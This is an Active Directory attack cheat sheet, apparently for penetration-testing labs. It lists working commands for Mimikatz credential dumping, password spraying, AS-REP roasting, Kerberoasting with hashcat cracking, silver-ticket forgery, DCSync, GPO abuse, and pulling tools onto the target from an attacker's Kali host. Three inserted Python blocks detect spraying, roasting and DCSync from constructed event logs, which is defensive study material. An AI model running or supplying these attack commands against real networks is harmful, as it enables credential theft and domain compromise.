Attack

Mimikatz.exe

NOTE: Make sure to run PowerShell as Administrator

Launch Mimikatz.exe

C:\Tools\mimikatz.exe

Enable SeDebugPrivilege (required to read LSASS memory)

privilege::debug

Dump credentials (NTLM hashes) of logged-on users from LSASS

sekurlsa::logonpasswords

Dump local account NTLM hashes from the SAM

lsadump::sam

One-liner

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Enumeration

To view the account policy (lockout threshold, lockout duration, observation window)

net accounts

Password Attacks

Spray-Passwords.ps1 (Target Machine)

C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admin

crackmapexec (Kali)

crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-success

NOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine

Kerbrute_windows_amd64.exe (Target Machine)

C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"
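The three spraying commands above all leave the same trace on the domain: failed logons for many different accounts from one source in a short time. The following detection logic is an added example (not part of the original cheat sheet) that finds that pattern in constructed Windows Security event records; only the event IDs 4625 and 4771 are real.

```python
"""Detect password spraying from Windows logon-failure events.

Added example, not from the original cheat sheet. A spray produces failures for
many *different* accounts from one source, usually one try per account to stay
under the lockout threshold reported by `net accounts`. Event IDs 4625 (failed
logon) and 4771 (Kerberos pre-auth failed) are real; the records are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, source_ip, target_user).
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", 4625, "192.168.50.70", "jeff"),
    ("2024-05-01T09:00:02", 4625, "192.168.50.70", "dave"),
    ("2024-05-01T09:00:03", 4771, "192.168.50.70", "pete"),
    ("2024-05-01T09:00:04", 4771, "192.168.50.70", "jen"),
    ("2024-05-01T09:00:05", 4625, "192.168.50.70", "iis_service"),
    ("2024-05-01T09:00:06", 4625, "192.168.50.70", "jeffadmin"),
    # One user mistyping their own password three times is not a spray.
    ("2024-05-01T09:05:00", 4625, "192.168.50.10", "dave"),
    ("2024-05-01T09:05:09", 4625, "192.168.50.10", "dave"),
    ("2024-05-01T09:05:20", 4625, "192.168.50.10", "dave"),
]

def detect_password_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: sorted distinct target users} for every source that
    failed against at least `min_users` distinct accounts inside `window`."""
    by_source = defaultdict(list)
    for ts, event_id, source, user in events:
        if event_id in (4625, 4771):
            by_source[source].append((datetime.fromisoformat(ts), user.lower()))

    alerts = {}
    for source, attempts in by_source.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until attempts[start:end+1] fits.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {user for _, user in attempts[start:end + 1]}
            if len(users) >= min_users:
                alerts.setdefault(source, set()).update(users)
    return {source: sorted(users) for source, users in alerts.items()}

if __name__ == "__main__":
    for source, users in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {source}: {', '.join(users)}")
```

A single account failing repeatedly from one source is a brute-force pattern, not a spray, so it is deliberately not flagged here.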

AS-REP Roasting

Impacket-GetNPUsers (Kali)

Get the AS-REP hashes of users that have "Do not require Kerberos preauthentication" enabled

impacket-GetNPUsers <DOMAIN NAME>/ -dc-ip <DC IP Address> -usersfile <Username Lists> -format hashcat -outputfile hashes.asreproast -no-pass

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get the AS-REP hashes of users that have "Do not require Kerberos preauthentication" enabled

C:\Tools\Rubeus.exe asreproast /nowrap

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Impacket-GetUserSPNs (Kali)

Request service tickets for accounts with an SPN and save the TGS-REP hashes

sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Request service tickets for accounts with an SPN and save the TGS-REP hashes

C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
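Both roasting techniques above are visible in the domain controller's Kerberos audit events: an AS-REP roast shows up as a 4768 (TGT requested) with PreAuthType 0, and a Kerberoast as a burst of 4769 (service ticket requested) events for RC4 (0x17) tickets to user-account SPNs. This added example (not from the original cheat sheet) applies both checks to constructed event records; the event IDs, field names and encryption-type values are real.

```python
"""Detect AS-REP roasting and Kerberoasting from DC Kerberos audit events.

Added example, not from the original cheat sheet. PreAuthType 0 on 4768 means
the TGT was issued without pre-authentication; TicketEncryptionType 0x17 on
4769 is RC4-HMAC, the weak etype requested so the hash cracks as hashcat -m
13100 (0x12 is AES256). The records below are constructed sample data.
"""
from collections import defaultdict

SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "dave", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.50.70"},
    {"EventID": 4768, "TargetUserName": "jeff", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.50.75"},
    {"EventID": 4769, "TargetUserName": "pete@CORP.COM", "ServiceName": "iis_service",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.50.70"},
    {"EventID": 4769, "TargetUserName": "pete@CORP.COM", "ServiceName": "sql_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.50.70"},
    {"EventID": 4769, "TargetUserName": "pete@CORP.COM", "ServiceName": "http_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.50.70"},
    # A normal AES service ticket to a computer account: not roasting.
    {"EventID": 4769, "TargetUserName": "jeff@CORP.COM", "ServiceName": "WEB04$",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.50.75"},
]

def detect_asrep_roasting(events):
    """Accounts whose TGT was issued without pre-authentication (4768, PreAuthType 0)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"})

def detect_kerberoasting(events, min_services=3):
    """(requester, source IP) pairs that obtained RC4 service tickets for at
    least `min_services` distinct user-account SPNs (computer accounts end in '$')."""
    services = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17"
                and not e["ServiceName"].endswith("$")
                and e["ServiceName"] != "krbtgt"):
            services[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return {k: sorted(v) for k, v in services.items() if len(v) >= min_services}

if __name__ == "__main__":
    print("AS-REP roastable accounts requested:", detect_asrep_roasting(SAMPLE_EVENTS))
    print("possible Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
```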

Silver Tickets

NOTE: Information needed

  • SPN password hash

  • Domain SID

  • Target SPN

Get the SPN (service account) password hash with mimikatz.exe

C:\Tools\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

* Copy the NTLM hash of the service account from the output

Get the Domain SID from the current user's SID

whoami /user

Remove the RID, i.e. the number after the last "-"

EXAMPLE:

PS C:\Windows\system32> whoami /user

USER INFORMATION
----------------

User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105

# Domain SID = S-1-5-21-1987370270-658905905-1781884369

Get Target SPN from PowerView.ps1

Import-Module C:\Tools\PowerView.ps1

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To forge the silver ticket in mimikatz.exe

kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Server FQDN> /service:<SPN Service, e.g. http> /rc4:<SPN Password Hash> /user:<Domain User>

EXAMPLE:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Dcsync

Mimikatz.exe (Target Machine)

To obtain the hash

lsadump::dcsync /user:<Domain Name>\<Username>

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Impacket-secretsdump

impacket-secretsdump -just-dc-user <Target Username> <Domain Name>/<Username>:'<Password>'@<DC IP Address>

NOTE: In the "Using the DRSUAPI method" section of the output, each line has the form <domain>\<user>:<RID>:<LM hash>:<NT hash>:::, so the NTLM (NT) hash is the value directly before the trailing ":::"

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
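Both DCSync methods above go through the DRSUAPI replication interface, which needs the DS-Replication-Get-Changes rights; with directory service access auditing enabled the DC logs a 4662 whose Properties contain the corresponding control-access-right GUIDs. This added example (not from the original cheat sheet) flags such events from non-machine accounts in constructed records; the GUIDs are the real schema values, and the allowlist name is an assumption for the reader to fill in.

```python
"""Detect DCSync from Directory Service access events (4662).

Added example, not from the original cheat sheet. Domain controllers replicate
to each other legitimately, so machine accounts (names ending in '$') and an
explicit allowlist (e.g. a sync service account) are skipped. The GUIDs are the
real control-access rights; the event records below are constructed sample data.
"""
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

SAMPLE_EVENTS = [
    # Constructed: a domain controller replicating from its peer (benign).
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Constructed: a user account exercising the same replication right.
    {"EventID": 4662, "SubjectUserName": "jeffadmin", "SubjectDomainName": "CORP",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Constructed: an ordinary object access with no replication GUID.
    {"EventID": 4662, "SubjectUserName": "jeff", "SubjectDomainName": "CORP",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def detect_dcsync(events, allowed_accounts=()):
    """Return [(DOMAIN\\user, [right names])] for every non-machine, non-allowlisted
    account that exercised a replication right in a 4662 event."""
    allowed = {a.lower() for a in allowed_accounts}
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["SubjectUserName"].endswith("$"):
            continue
        subject = f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}'
        if subject.lower() in allowed:
            continue
        props = e["Properties"].lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights:
            hits.append((subject, rights))
    return hits

if __name__ == "__main__":
    # "CORP\\aadsync" is an assumed allowlist entry, not an account from the page.
    for subject, rights in detect_dcsync(SAMPLE_EVENTS, allowed_accounts=["CORP\\aadsync"]):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```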

Exploits

SharpGPOAbuse.exe

Fetch SharpGPOAbuse.exe (Kali)

wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe

Download SharpGPOAbuse.exe (Target Machine, served over HTTP from Kali)

iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe

Run command

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"

Force Group Policy to update

gpupdate /force

Change password

NOTE: Must have permission on the user

net user <Username> <New Password> /domain

Or, with the ActiveDirectory PowerShell module:

Set-ADAccountPassword -Identity "<Username>" -NewPassword (ConvertTo-SecureString "<New Password>" -AsPlainText -Force) -Reset

GUI (interactive: runas prompts for the password and opens a new cmd.exe window)

runas /user:<Domain Name>\<Username> cmd.exe

CLI (non-interactive: Invoke-RunasCs takes the password as an argument)

Fetch Invoke-RunasCs.ps1 (Kali)

wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1

Download Invoke-RunasCs.ps1 (Target Machine, served over HTTP from Kali)

iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -OutFile Invoke-RunasCs.ps1

Run command

Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"

Add user to group

NOTE: Must have permission on the group

net group "<Group Name>" <Username> /add /domain
